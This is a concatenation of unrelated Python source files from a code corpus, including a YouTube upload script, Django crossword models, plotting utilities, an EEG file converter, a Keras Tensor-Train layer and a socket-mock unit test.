def initialize_upload(youtube, options):
tags = None
if options.keywords:
tags = options.keywords.split(",")
body=dict(
snippet=dict(
title=options.title,
description=options.description,
tags=tags,
categoryId=options.category
),
status=dict(
privacyStatus=options.privacyStatus
)
)
# Call the API's videos.insert method to create and upload the video.
insert_request = youtube.videos().insert(
part=",".join(list(body.keys())),
body=body,
# The chunksize parameter specifies the size of each chunk of data, in
# bytes, that will be uploaded at a time. Set a higher value for
# reliable connections as fewer chunks lead to faster uploads. Set a lower
# value for better recovery on less reliable connections.
#
# Setting "chunksize" equal to -1 in the code below means that the entire
# file will be uploaded in a single HTTP request. (If the upload fails,
# it will still be retried where it left off.) This is usually a best
# practice, but if you're using Python older than 2.6 or if you're
# running on App Engine, you should set the chunksize to something like
# 1024 * 1024 (1 megabyte).
media_body=MediaFileUpload(options.file, chunksize=-1, resumable=True)
)
resumable_upload(insert_request)
# This method implements an exponential backoff strategy to resume a
# failed upload.
def resumable_upload(insert_request):
response = None
error = None
retry = 0
while response is None:
try:
print("Uploading file...")
status, response = insert_request.next_chunk()
if response is not None:
if 'id' in response:
print("Video id '%s' was successfully uploaded." % response['id'])
else:
exit("The upload failed with an unexpected response: %s" % response)
except HttpError as e:
if e.resp.status in RETRIABLE_STATUS_CODES:
error = "A retriable HTTP error %d occurred:\n%s" % (e.resp.status,
e.content)
else:
raise
except RETRIABLE_EXCEPTIONS as e:
error = "A retriable error occurred: %s" % e
if error is not None:
print(error)
retry += 1
if retry > MAX_RETRIES:
exit("No longer attempting to retry.")
max_sleep = 2 ** retry
sleep_seconds = random.random() * max_sleep
print("Sleeping %f seconds and then retrying..." % sleep_seconds)
time.sleep(sleep_seconds)
if __name__ == '__main__':
argparser.add_argument("--file", required=True, help="Video file to upload")
argparser.add_argument("--title", help="Video title", default="Test Title")
argparser.add_argument("--description", help="Video description",
default="Test Description")
argparser.add_argument("--category", default="22",
help="Numeric video category. " +
"See https://developers.google.com/youtube/v3/docs/videoCategories/list")
argparser.add_argument("--keywords", help="Video keywords, comma separated",
default="")
argparser.add_argument("--privacyStatus", choices=VALID_PRIVACY_STATUSES,
default=VALID_PRIVACY_STATUSES[0], help="Video privacy status.")
args = argparser.parse_args()
if not os.path.exists(args.file):
exit("Please specify a valid file using the --file= parameter.")
youtube = get_authenticated_service(args)
try:
initialize_upload(youtube, args)
except HttpError as e:
print("An HTTP error %d occurred:\n%s" % (e.resp.status, e.content))#!/usr/bin/python
| StarcoderdataPython |
286235 | <filename>src/rubrix/server/users/api.py
from fastapi import APIRouter, Depends
from rubrix.server.security.api import get_current_active_user
from .model import User
router = APIRouter(tags=["users"])
@router.get(
"/me",
response_model=User,
response_model_exclude_none=True,
operation_id="whoami",
)
async def whoami(current_user: User = Depends(get_current_active_user)):
"""
User info endpoint
Parameters
----------
current_user:
The current request user
Returns
-------
The current user
"""
return current_user
| StarcoderdataPython |
12856143 | <reponame>fiee/croisee<filename>croisee/croisee/models.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import absolute_import
import unicodedata
import re, os
import logging
from django.utils.translation import ugettext_lazy as _
from django.db import models
from django.template.loader import render_to_string
from django.conf import settings
from django.contrib.auth.models import User
logger = logging.getLogger(settings.PROJECT_NAME)
REPLACEMENTS = (
# international characters that need more than just stripping accents
('Ä', 'AE'),
('Ö', 'OE'),
('Ü', 'UE'),
('ß', 'SS'),
('Œ', 'OE'),
('Æ', 'AE'),
('Ø', 'OE'),
)
reASCIIonly = re.compile(r'[^A-Z]', re.I)
reCleanInput = re.compile(r'[^\w_%\?\*]', re.I)
def cleanword(word, strict=True):
word = word.upper()
for k,v in REPLACEMENTS:
word = word.replace(k,v)
word = unicodedata.normalize('NFD', word).encode('ASCII', errors='ignore').decode('ASCII') # decompose international chars
if strict:
word = reASCIIonly.sub('', word)
else:
word = reCleanInput.sub('', word)
return word
def splitwordline(line):
"""
a line from a wordlist may contain word, description and priority, separated by tabs
if description and priority are missing, default is the word and 0
"""
parts = line.replace('\n','').split('\t')
if len(parts)==1:
parts.extend([parts[0],0])
elif len(parts)==2:
parts.append(0)
elif len(parts)>3:
parts = parts[0:2]
if len(parts[1])<2:
parts[1] = parts[0]
try:
parts[2] = int(parts[2])
except ValueError as ex:
parts[2] = 0
parts[0] = cleanword(parts[0])
return parts
class Dictionary(models.Model):
"""
A dictionary
"""
class Meta:
verbose_name = _('Dictionary')
verbose_name_plural = _('Dictionaries')
ordering = ['language','name']
unique_together = (('name','language'),)
name = models.CharField(_('Name'), max_length=31, help_text=_('A short descriptive name'))
public = models.BooleanField(_('public?'), default=True, help_text=_('May everyone use this dictionary?'))
language = models.CharField(_('Language'), max_length=15,
default=settings.LANGUAGE_CODE, choices=settings.LANGUAGES,
help_text=_('Language of (most of) the words in this dictionary'))
description = models.CharField(_('Description'), max_length=255, blank=True)
owner = models.ForeignKey(User, verbose_name=_('Owner'))
def __str__(self):
return "%s (%s)" % (self.name, self.language)
def get_absolute_url(self):
return '/dictionary/%d/' % self.id
class Word(models.Model):
"""
A word with a description, according to a dictionary
"""
class Meta:
verbose_name = _('Word')
verbose_name_plural = _('Words')
ordering = ['word','priority']
unique_together = (('word','dictionary'),)
word = models.CharField(_('Word'), max_length=63, help_text=_('a word fitting a crossword puzzle; will become uppercased; no numbers, hyphens etc.'))
dictionary = models.ForeignKey(Dictionary, verbose_name=_('Dictionary')) #, related_name="%(class)s_related")
description = models.CharField(_('Description'), max_length=127, help_text=_('Meaning of the word within the context of the selected dictionary'))
priority = models.SmallIntegerField(_('Priority'), default=0, help_text=_('0 is neutral, you can increase or decrease the priority'))
def __str__(self):
return "%s\t%s" % (self.word, self.description)
def save(self, *args, **kwargs):
self.word = cleanword(self.word)
super(Word, self).save(*args, **kwargs)
def get_absolute_url(self):
return '/dictionary/%d/%s/' % (self.dictionary.id, self.word)
class WordlistUpload(models.Model):
"""
Wordlist importer
"""
wordlist_file = models.FileField(_('wordlist file (.txt)'), upload_to=os.path.relpath(os.path.join(settings.MEDIA_ROOT, 'temp')),
help_text=_('Select a .txt file containing a single word per line to upload as a new dictionary.'))
dictionary = models.ForeignKey(Dictionary, null=True, blank=True, help_text=_('Select a dictionary to add these words to. leave this empty to create a new dictionary from the supplied name.'))
name = models.CharField(_('Name'), max_length=31, blank=True, help_text=_('A short descriptive name'))
uniqueonly = models.BooleanField(_('only unique'), default=True, help_text=_('Import only words that are not contained in any other dictionary?'))
public = models.BooleanField(_('public?'), default=True, help_text=_('May everyone use this dictionary?'))
language = models.CharField(_('Language'), max_length=15,
default=settings.LANGUAGE_CODE, choices=settings.LANGUAGES,
help_text=_('Language of (most of) the words in this dictionary'))
description = models.CharField(_('Description'), blank=True, max_length=255)
owner = models.ForeignKey(User, verbose_name=_('Owner'))
class Meta:
verbose_name = _('wordlist upload')
verbose_name_plural = _('wordlist uploads')
def __str__(self):
return "%s (%s)" % (self.name, self.wordlist_file)
def save(self, *args, **kwargs):
super(WordlistUpload, self).save(*args, **kwargs)
dictionary = self.process_wordlist()
super(WordlistUpload, self).delete()
return dictionary
def process_wordlist(self):
if not os.path.isfile(self.wordlist_file.path):
# TODO: throw exception?
return None
wordfile = open(self.wordlist_file.path, 'rU', encoding='utf-8')
lines = wordfile.readlines()
wordfile.close()
if self.dictionary:
D = self.dictionary
else:
if not self.name:
# TODO: throw exception?
return false
D = Dictionary.objects.create(
name = self.name,
public = self.public,
language = self.language,
description = self.description,
owner = self.owner,
)
D.save()
for line in lines:
(newword, newdesc, newprio) = splitwordline(line)
newdesc = newdesc[:127] # max. length
# TODO: exception if decoding fails
if len(newword) < 2: continue
try:
if self.uniqueonly:
W = Word.objects.filter(word=newword, dictionary__language=D.language)
W = W[0]
else:
W = Word.objects.get(word=newword, dictionary=D)
except (Word.DoesNotExist, IndexError):
W = Word.objects.create(word=newword, dictionary=D)
if newdesc: W.description = newdesc
if newprio: W.priority = newprio
W.save()
try:
os.remove(self.wordlist_file.path)
except Exception as ex:
logger.exception(ex)
return D
PUZZLE_TYPES = (
('d', _('default crossword puzzle with black squares')), # numbers and black squares in grid. only possible type ATM
('b', _('crossword puzzle with bars (no squares)')),
('s', _('Swedish crossword puzzle (questions in squares)')), # default in most magazines
# other...
)
class Puzzle(models.Model):
"""
"""
title = models.CharField(verbose_name=_('title'), max_length=255, blank=True, help_text=_('title or short description of this puzzle'))
code = models.SlugField(verbose_name=_('code'), max_length=63, editable=False, unique=True, help_text=_('auto-generated URL code of this puzzle'))
public = models.BooleanField(verbose_name=_('public'), default=True, help_text=_('Is this puzzle publicly viewable?'))
language = models.CharField(verbose_name=_('language'), max_length=7, default=settings.LANGUAGE_CODE, help_text=_('main language of this puzzle'), choices=settings.LANGUAGES)
owner = models.ForeignKey(User, verbose_name=_('owner'), help_text=_('owner of the puzzle'))
createdby = models.ForeignKey(User, verbose_name=_('created by'), related_name='+', editable=False, help_text=_('user that saved the puzzle for the first time (may be anonymous)'))
lastchangedby = models.ForeignKey(User, verbose_name=_('last changed by'), related_name='+', editable=False, help_text=_('user that saved the puzzle the latest time'))
createdon = models.DateTimeField(verbose_name=_('created on'), auto_now_add=True, help_text=_('timestamp of creation (first save)'))
lastchangedon = models.DateTimeField(verbose_name=_('last changed on'), auto_now=True, help_text=_('timestamp of last change'))
type = models.CharField(verbose_name=_('type'), max_length=1, default='d', editable=False, help_text=_('type of this puzzle'), choices=PUZZLE_TYPES)
width = models.PositiveSmallIntegerField(verbose_name=_('width'), default=settings.CROISEE_GRIDDEF_X, help_text=_('width of the puzzle (number of characters)'))
height = models.PositiveSmallIntegerField(verbose_name=_('height'), default=settings.CROISEE_GRIDDEF_Y, help_text=_('height of the puzzle (number of characters)'))
text = models.TextField(verbose_name=_('text'), blank=True, help_text=_('characters of the puzzle (solution)'))
numbers = models.TextField(verbose_name=_('numbers'), blank=True, help_text=_('list of coordinates of word start numbers')) # x,y,num\n
questions = models.TextField(verbose_name=_('questions'), blank=True, help_text=_('list of questions')) # 1::h::Description\n
class Meta:
verbose_name = _('crossword puzzle')
verbose_name_plural = _('crossword puzzles')
def __str__(self):
return "%s (%s)" % (self.code, self.title)
def get_absolute_url(self):
return '/puzzle/%s/' % self.code
| StarcoderdataPython |
1974277 | <reponame>UrosOgrizovic/FIFA-19-player-position-predictor<gh_stars>1-10
import seaborn as sns
import numpy as np
import matplotlib.pyplot as plt
import globals as GLOBALS
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
def plot_number_of_players_by_position(players):
sns.set(style="darkgrid")
plot = sns.countplot(x="Position", data=players, order=players["Position"].value_counts().index)
figure = plot.get_figure()
figure.set_size_inches(12.8, 7.2)
figure.savefig("plot/players_by_position.png")
plt.show()
def plot_number_of_players_by_section(players):
num_of_players_by_section = {"ATT": 0, "MID": 0, "DEF": 0, "GK": 0}
for i in range(len(players["Position"])):
if players["Position"].iloc[i] in GLOBALS.attacking_positions:
num_of_players_by_section["ATT"] += 1
elif players["Position"].iloc[i] in GLOBALS.midfield_positions:
num_of_players_by_section["MID"] += 1
elif players["Position"].iloc[i] in GLOBALS.defensive_positions:
num_of_players_by_section["DEF"] += 1
elif players["Position"].iloc[i] == "GK":
num_of_players_by_section["GK"] += 1
df = pd.DataFrame(num_of_players_by_section.items(), columns=["Section", "Number of players"])
df = df.sort_values(["Number of players"], ascending=False).reset_index(drop=True)
sns.set(style="darkgrid")
plot = sns.barplot(x="Section", y="Number of players", data=df)
figure = plot.get_figure()
figure.set_size_inches(12.8, 7.2)
figure.savefig("plot/players_by_section.png")
plt.show()
def plot_correlation_matrix(players):
"""
1. plots correlation matrix, to see which values can be removed
2. saves correlation matrix to "correlation_matrix.png"
:param players:
:return:
"""
# Compute the correlation matrix
corr = players.corr()
# Generate a mask for the upper triangle
mask = np.zeros_like(corr)
mask[np.triu_indices_from(mask)] = True
# Set up the matplotlib figure
figure, ax = plt.subplots(figsize=(12.8, 7.2))
# Generate a custom diverging colormap
cmap = sns.diverging_palette(220, 10, as_cmap=True)
# Draw the heatmap with the mask and correct aspect ratio
sns.heatmap(corr, mask=mask, cmap=cmap, vmax=.3, center=0,
square=True, linewidths=.5, cbar_kws={"shrink": .5})
figure.savefig("plot/" + "correlation_matrix.png")
plt.show()
def plot_some_attributes(players, attribute_name):
# plot x_train using plt
plt.style.use('ggplot')
plot = sns.distplot(players[attribute_name])
figure = plot.get_figure()
figure.set_size_inches(12.8, 7.2)
figure.savefig("plot/" + attribute_name.lower() + ".png")
plt.show() | StarcoderdataPython |
3517338 | # https://www.hackerrank.com/challenges/simple-array-sum
import sys
if __name__ == '__main__':
f = sys.stdin
n = int(f.readline())
numbers = list(map(int, f.readline().strip().split()))
print(sum(numbers))
| StarcoderdataPython |
4840457 | # -*- coding: utf-8 -*-
"""
Application Constants, Defualt Values
:author: <NAME>
:version: 0.1
:date: 14 Sep. 2017
"""
__docformat__ = "restructuredtext"
SCENARIO_NAME = "PlanHeat"
SCENARIO_VERSION = 15
CONFIG_FILE_PATH="/config/"
CONFIG_FILE_NAME="PlanHeat.cfg"
TEMP_DIR_PATH="temp"
LOG_DIR_PATH ="log"
LOG_LEVELS={"CRITICAL":50,
"ERROR":40,
"WARNING":30,
"INFO":20,
"DEBUG":10,
"NOTSET":0}
DB_PARAMS = {"databaseName" : "PlanHeat.db",
"path" : "/db/"
}
LOG_PARAMS = {"logName" : "PlanHeat",
"logExt" : "log",
"loggingLevel": LOG_LEVELS["INFO"],
"path" : "/log/"}
JAR_FILE_PARAMS= {"jarFileName" : "llamada.jar", "path" : "/java/"}
JAVA_MAIN_CLASS="tecnalia.geoprocess.PerformProcess"
INTERMEDIATE_FILE_CSV="xmlResultado.csv"
USE_NOA_DATA="Y"
NOA_URL = "http://snf-652558.vm.okeanos.grnet.gr/planheat/proxy.php?action=getCHEntities"
EPSG_URL = "http://prj2epsg.org/search.json"
#NOA HTTP API Rest Response Codes
HTTP_RESPONSE_OK=200
NOA_TIMEOUT=30 #30 Seconds
HOURS_PER_YEAR=8760
RAW_FILES_TTL = 86400 # 1 days seconds
DAYS_REMOVE_OLD_LOGS=3
DECIMAL_POINT_IS_COMMA="Y"
LIDAR_FILE_EXT="asc"
# SHAPE Constants
SHAPE_TYPE_FILE={"0":'NULL',"1":'POINT',"3":'POLYLINE',"5":'POLYGON',"8":'MULTIPOINT',"11":'POINTZ',"13":'POLYLINEZ',"15":'POLYGONZ',"18":'MULTIPOINTZ',"21":'POINTM', \
"23":'POLYLINEM',"25":'POLYGONM',"28":'MULTIPOINTM',"31":'MULTIPATCH'}
PROCESS_THREAD_PRIORITY=7 # use the same priority as the creating thread. This is the default.
PROCESS_WAIT_TO_KILL=5 # Seconds Waiting for terminate the Thread
USE_PERSIST_SCENARIO = "Y"
LAUNCH_JAVA_PROCESS = "Y"
OPTIONS_FILE = "N"
| StarcoderdataPython |
1892880 | import numpy as np
import os
import pandas as pd
'''
Takes in a pair file of .ades and .dat and extracts the channel names and the corresponding SEEG time series
places them into four different files
- raw numpy
- headers csv
- annotations csv
- channels csv
Which follows format that we place data from .edf files. Most data is empty since .ades does not get alot of these
data points.
'''
def rawtonumpy(raweeg, outputdatafile):
# open output Numpy file to write
npfile = open(outputdatafile, 'wb')
np.save(npfile, raweeg)
def chantocsv(chanlabels, samplerate, numsamps, outputchanfile):
##################### 2. Import channel headers ########################
# create list with dataframe column channel header names
channelheaders = [[
'Channel Number',
'Labels',
'Physical Maximum',
'Physical Minimum',
'Digital Maximum',
'Digital Minimum',
'Sample Frequency',
'Num Samples',
'Physical Dimensions',
]]
# get the channel labels of file and convert to list of strings
# -> also gets rid of excessive characters
chanlabels = [str(x).replace('POL', '').replace(' ', '')
for x in chanlabels]
# read chan header data from each chan for each column and append to list
for i in range(len(chanlabels)):
channelheaders.append([
i + 1,
chanlabels[i],
'',
'',
'',
'',
samplerate,
numsamps,
'',
])
# create CSV file of channel header names and data
channelheaders_df = pd.DataFrame(data=channelheaders)
# create CSV file of file header names and data
channelheaders_df.to_csv(outputchanfile, index=False, header=False)
def annotationtocsv(outputannotationsfile):
##################### 3. Import File Annotations ########################
# create list
annotationheaders = [[
'Time (sec)',
'Duration',
'Description'
]]
for n in np.arange(0):
annotationheaders.append([
'',
'',
''
])
annotationheaders_df = pd.DataFrame(data=annotationheaders)
# create CSV file of channel header names and data
annotationheaders_df.to_csv(
outputannotationsfile,
index=False,
header=False)
def headerstocsv(samplerate, numsamps, outputheadersfile):
# create list with dataframe column file header names
fileheaders = [[
'pyedfib Version',
'Birth Date',
'Gender',
'Start Date (D-M-Y)',
'Start Time (H-M-S)',
'Patient Code',
'Equipment',
'Data Record Duration (s)',
'Number of Data Records in File',
'Number of Annotations in File',
'Sample Frequency',
'Samples in File',
'Physical Dimension'
]]
# append file header data for each dataframe column to list
# startdate = str(edffile.getStartdatetime().day) + '-' + str(edffile.getStartdatetime().month) + '-' + str(edffile.getStartdatetime().year)
# starttime = str(edffile.getStartdatetime().hour) + '-' + str(edffile.getStartdatetime().minute) + '-' + str(edffile.getStartdatetime().second)
fileheaders.append([
'',
'',
'',
'',
'',
'',
'',
numsamps / float(samplerate),
'',
'',
samplerate,
numsamps,
'',
])
# create dataframes from array of meta data
fileheaders_df = pd.DataFrame(data=fileheaders)
fileheaders_df.to_csv(outputheadersfile, index=False, header=False)
def read_ades(fname):
dat_fname = fname.split('.ades')[0] + '.dat'
srate = None
nsamp = None
sensors = []
with open(fname, 'r') as fd:
for line in fd.readlines():
if line.startswith('#'):
continue
# parts = line.strip().split(' ')
# lhs = parts[0]
# rhs = parts[2]
try:
lhs, _, rhs = line.strip().split(' ')
except ValueError:
lhs = line.strip().split(' ')
if lhs == 'samplingRate':
srate = float(rhs)
elif lhs == 'numberOfSamples':
nsamp = float(rhs)
elif lhs in ('date', 'time'):
pass
else:
if isinstance(lhs, list):
lhs = lhs[0]
sensors.append(lhs)
assert srate and nsamp
dat = np.fromfile(
dat_fname, dtype=np.float32).reshape(
(-1, len(sensors))).T
return srate, sensors, dat, nsamp
if __name__ == '__main__':
filename = './id004_cv_sz1.ades'
# set all directories
root_dir = os.path.join('/Users/adam2392/Downloads/')
outputdir = '/Users/adam2392/Downloads/converted'
# root_dir = os.path.join('/Volumes/<NAME>/pydata/tvbforwardsim/')
patient = 'id004_cv'
patient = 'id015_sf'
# patient = 'id001_ac'
datadir = os.path.join(root_dir, patient)
# Get ALL datafiles from all downstream files
datafiles = []
for root, dirs, files in os.walk(datadir):
for file in files:
if '.DS' not in file and '.ades' in file:
datafiles.append(os.path.join(root, file))
print(len(datafiles))
def patdir(idx): return patient.lower() + '_sz' + str(idx)
for idx, filename in enumerate(datafiles):
print(idx, filename)
srate, sensors, dat, nsamp = read_ades(filename)
if not os.path.exists(os.path.join(outputdir, patdir(idx))):
os.makedirs(os.path.join(outputdir, patdir(idx)))
# 1. setting filename
npyfile = os.path.join(
outputdir,
patdir(idx),
patdir(idx) +
'_rawnpy.npy')
chanfile = os.path.join(
outputdir,
patdir(idx),
patdir(idx) +
'_chans.csv')
headerfile = os.path.join(
outputdir,
patdir(idx),
patdir(idx) +
'_headers.csv')
annotationsfile = os.path.join(
outputdir,
patdir(idx),
patdir(idx) +
'_annotations.csv')
rawtonumpy(dat, npyfile)
chantocsv(sensors, srate, nsamp, chanfile)
headerstocsv(srate, nsamp, headerfile)
annotationtocsv(annotationsfile)
| StarcoderdataPython |
321067 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.14 on 2018-12-20 17:10
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ping', '0006_auto_20180113_0247'),
]
operations = [
migrations.RemoveField(
model_name='region',
name='description',
),
migrations.AddField(
model_name='company',
name='description_en',
field=models.TextField(blank=True, null=True),
),
]
| StarcoderdataPython |
4818468 | import copy
n = int(input())
v = input().split()
x = []
y = []
for i in range(n):
if i % 2 == 0:
x.append(v[i])
else:
y.append(v[i])
x.sort()
y.sort()
q = []
r = []
s = []
t = []
countx = 1
county = 1
for j in range(int(n / 2)):
if x[j - 1] == x[j] and j != 0:
countx += 1
if j == n / 2 - 1:
s.append(countx)
q.append(x[j])
countx = 1
elif x[j - 1] != x[j] and j != 0:
s.append(countx)
q.append(x[j - 1])
countx = 1
for k in range(int(n / 2)):
if y[k - 1] == y[k] and k != 0:
county += 1
if k == n / 2 - 1:
t.append(county)
r.append(y[k])
county = 1
elif y[k - 1] != y[k] and k != 0:
t.append(county)
r.append(y[k - 1])
county = 1
s2 = copy.deepcopy(s)
t2 = copy.deepcopy(t)
#a = [int(m) for m in a]
s2.sort(reverse=True)
t2.sort(reverse=True)
sc = -1
tc = -1
sk = 0
tk = 0
ssym = 0
for i in s2:
if sc == -1:
sk = i
elif sc == 0:
sk = i
ssym = 1
break
sc += 1
if sc == 0 and ssym == 0:
sk = 0
tsym = 0
for i in t2:
if tc == -1:
tk = i
elif tc == 0:
tk = i
tsym = 1
break
tc += 1
if tc == 0 and tsym == 0:
tk = 0
if q[s.index(max(s))] != r[t.index(max(t))]:
print(n - max(s) - max(t))
else:
if sk >= tk:
print(n - sk - max(t))
else:
print(n - max(s) - tk)
| StarcoderdataPython |
305709 | '''
Implementation of the paper 'Tensorizing Neural Networks', <NAME>, <NAME>, <NAME>, <NAME>, NIPS, 2015
to compress a dense layer using Tensor Train factorization.
TTLayer compute y = Wx + b in the compressed form.
'''
from keras import backend as K, activations, initializers
from keras.engine.topology import Layer
import numpy as np
import tensorflow as tf
from palmnet.utils import get_facto_for_channel_and_order, DCT_CHANNEL_PREDEFINED_FACTORIZATIONS
class TTLayerDense(Layer):
""" Given x\in\mathbb{R}^{N}, b\in\mathbb{R}^{M}, W\in\mathbb{R}^{M\times N}, y\in\mathbb{R}^{M}, compute y = Wx + b in the TT-format.
Parameters:
inp_modes: [n_1, n_2, ..., n_k] such that n_1*n_2*...*n_k=N
out_modes: [m_1, m_2, ..., m_k] such that m_1*m_2*...m_k = M
mat_ranks: [1, r_1, r_2, ..., r_k]
"""
def __init__(self, nb_units, mat_ranks, inp_modes=None, out_modes=None, mode="auto", bias_initializer='zeros', kernel_initializer='glorot_normal', use_bias=True, activation=None, **kwargs):
self.activation = activations.get(activation)
self.use_bias = use_bias
self.kernel_initializer = initializers.get(kernel_initializer)
self.bias_initializer = initializers.get(bias_initializer)
self.mode = mode
self.mat_ranks = np.array(mat_ranks).astype(int)
self.order = len(self.mat_ranks) - 1
self.nb_units = nb_units
if self.mode == "auto":
self.inp_modes = inp_modes
self.out_modes = out_modes
elif self.mode == "manual":
if inp_modes is None or out_modes is None:
raise ValueError("inp_modes and out_modes should be specified in mode manual.")
self.inp_modes = np.array(inp_modes).astype(int)
self.out_modes = np.array(out_modes).astype(int)
self.num_dim = self.inp_modes.shape[0]
if np.prod(self.out_modes) != self.nb_units:
raise ValueError("out_modes product should equal to nb units: {} != {}".format(np.prod(self.out_modes), self.nb_units))
if self.inp_modes.shape[0] != self.out_modes.shape[0]:
raise ValueError("The number of input and output dimensions should be the same.")
if self.order != self.out_modes.shape[0]:
raise ValueError("Rank should have one more element than input/output shape")
for r in self.mat_ranks:
if isinstance(r, np.integer) != True:
raise ValueError("The rank should be an array of integer.")
else:
raise ValueError("Unknown mode {}".format(self.mode))
super(TTLayerDense, self).__init__(**kwargs)
self.image_max_size = -1
def build(self, input_shape):
inp_ch = input_shape[-1]
if self.mode == "auto":
self.inp_modes = get_facto_for_channel_and_order(inp_ch, self.order, dct_predefined_facto=DCT_CHANNEL_PREDEFINED_FACTORIZATIONS) if self.inp_modes is None else self.inp_modes
self.out_modes = get_facto_for_channel_and_order(self.nb_units, self.order, dct_predefined_facto=DCT_CHANNEL_PREDEFINED_FACTORIZATIONS) if self.out_modes is None else self.out_modes
assert np.prod(self.out_modes) == self.nb_units, "The product of out_modes should equal to the number of output units."
assert np.prod(self.inp_modes) == inp_ch, "The product of inp_modes should equal to the input dimension."
dim = self.order
self.mat_cores = []
for i in range(dim):
self.mat_cores.append(
self.add_weight(name='mat_core_%d' % (i + 1), shape=[self.out_modes[i] * self.mat_ranks[i + 1], self.mat_ranks[i] * self.inp_modes[i]], initializer=self.kernel_initializer, trainable=True))
if self.use_bias:
self.bias = self.add_weight(name="bias", shape=(np.prod(self.out_modes),), initializer=self.bias_initializer, trainable=True)
super(TTLayerDense, self).build(input_shape)
def call(self, input_):
dim = self.order
out = tf.reshape(input_, [-1, np.prod(self.inp_modes)])
self.image_max_size = max(self.image_max_size, np.prod(self.inp_modes))
out = tf.transpose(out, [1, 0])
for i in range(dim):
out = tf.reshape(out, [self.mat_ranks[i] * self.inp_modes[i], -1])
out = tf.matmul(self.mat_cores[i], out)
out = tf.reshape(out, [self.out_modes[i], -1])
out = tf.transpose(out, [1, 0])
out = tf.reshape(out, [-1, np.prod(self.out_modes)])
# self.image_max_size = max(self.image_max_size, np.prod([val.value for val in out.get_shape()[1:]]))
if self.use_bias:
out = tf.add(out, self.bias, name='out')
if self.activation is not None:
out = self.activation(out)
return out
def compute_output_shape(self, input_shape):
return (input_shape[0], np.prod(self.out_modes))
def get_config(self):
super_config = super().get_config()
super_config.update({
"nb_units": self.nb_units,
"inp_modes": self.inp_modes,
"out_modes": self.out_modes,
"mat_ranks": self.mat_ranks,
"mode": self.mode,
'bias_initializer': initializers.serialize(self.bias_initializer),
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'use_bias': self.use_bias,
'activation': activations.serialize(self.activation),
})
return super_config
| StarcoderdataPython |
3407295 | class SubscriptionItem(object):
def __init__(self, name=None, state=None):
self.name = name
self.state = state
def __str__(self):
return self.name
| StarcoderdataPython |
78967 | import pytest
from multi_bracket_validation import multi_bracket_validation
def test_mbv_true_case_simple():
"""test function on balanced str"""
assert multi_bracket_validation('[{()}]') == True
def test_mbv_true_case_empty_str():
"""test function with empty string"""
assert multi_bracket_validation('') == True
def test_mbv_true_complex():
""" tests function with complex but balanced string"""
assert multi_bracket_validation('{{[[asdf]]}a}()') == True
def test_mbv_false_simple():
""" tests function returns false on unbalanced case"""
assert multi_bracket_validation('(') == False
def test_mbv_false_complex():
""" tests function returns false on complex unbalanced str"""
assert multi_bracket_validation('{asd{[asdf[]aasdf]}}())') == False
# str1 = '{[}]'
# str2 = '{{[[asdf]]}a}()'
# str3 = '{asd{[asdf[]aasdf]}}())'
# str4 = 'a'
# print(multi_bracket_validation(str1))
# print(multi_bracket_validation(str2))
# print(multi_bracket_validation(str3))
# print(multi_bracket_validation(str4)) | StarcoderdataPython |
54466 | #!/usr/bin/env python3
import getpass
import json
import pprint
import requests
import sys
# The credentials to be used
try:
user = input('Login name: ')
# If it's a tty, use the version that doesn't echo the password.
if sys.stdin.isatty():
password = getpass.getpass('Password: ')
else:
sys.stdout.write('Password: ')
sys.stdout.flush()
password = sys.stdin.readline().rstrip()
except:
print('Quitting')
sys.exit(1)
login = {
'username': user,
'password': password,
}
# Send credentials to login url to retrieve token. Raise
# an error, if the return code indicates a problem.
# Please use the URL of the system you'd like to access the API
# in the example below.
resp = requests.post('https://app.dimensions.ai/api/auth.json', json=login)
resp.raise_for_status()
# Create http header using the generated token.
headers = {
'Authorization': "JWT " + resp.json()['token']
}
# Execute DSL query.
resp = requests.post(
'https://app.dimensions.ai/api/dsl.json',
data='search publications in title_abstract_only for "SBML" return publications[basics+extras]',
headers=headers)
# Write to file.
with open('example-publications.json', 'w') as f:
json.dump(resp.json(), f)
| StarcoderdataPython |
4870274 | <reponame>aerostone/vdebug
import unittest
import vdebug.connection
class SocketMockError():
pass
class SocketMock():
def __init__(self):
self.response = []
self.last_msg = []
def recv(self,length):
ret = self.response[0]
if len(ret) >= length:
chars = ret[0:length]
newval = ret[length:]
if len(newval) > 0:
self.response[0] = newval
else:
self.response.pop(0)
if (length == 1):
return b"".join(chars)
else :
return b''.join(chars)
#if type(chars[0]) is int:
# print("len same as length")
# print(ret[0:length])
# return b''.join([bytes(i) for i in chars])
# return b"".join(chars)
#else:
# return b"".join(chars)
else:
self.response.pop(0)
return b''
def add_response(self,res):
digitlist = []
for i in str(res):
digitlist.append(bytes(i, "utf8"))
self.response.append(digitlist)
#res = bytes(res, 'utf8')
#self.response.append(list(res))
self.response.append([b'\x00'])
def send(self,msg):
self.last_msg.append( msg )
return len(msg)
def get_last_sent(self):
last = self.last_msg
self.last_msg = [];
return b''.join(last).decode('UTF-8')
def close(self):
pass
class ConnectionTest(unittest.TestCase):
def setUp(self):
self.conn = vdebug.connection.ConnectionHandler('', 0)
self.conn.sock = SocketMock()
"""
Test that the recv_msg method reads from the socket object.
The socket's recv() method is called for three purposes
1. Message length
2. Message body
3. A finishing null byte
"""
def test_read(self):
self.conn.sock.add_response(3)
self.conn.sock.add_response('foo')
self.conn.sock.add_response('\0')
response = self.conn.recv_msg()
assert response == 'foo'
"""
Test a longer read.
"""
def test_read_long(self):
self.conn.sock.add_response(24)
self.conn.sock.add_response('this is a longer message')
self.conn.sock.add_response('\0')
response = self.conn.recv_msg()
assert response == 'this is a longer message'
"""
Test that an EOFError is raised if the socket appears to be closed.
"""
def test_read_eof(self):
self.conn.sock.add_response('')
self.assertRaises(EOFError,self.conn.recv_msg)
"""
Test that the send_msg command calls send on the socket,
and adds a null byte to the string.
"""
def test_send(self):
cmd = 'this is a cmd'
self.conn.send_msg(cmd)
sent = self.conn.sock.get_last_sent()
assert sent == cmd+'\0'
| StarcoderdataPython |
3592899 | <gh_stars>1-10
# The MIT License (MIT)
# Copyright (c) 2015 <NAME>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
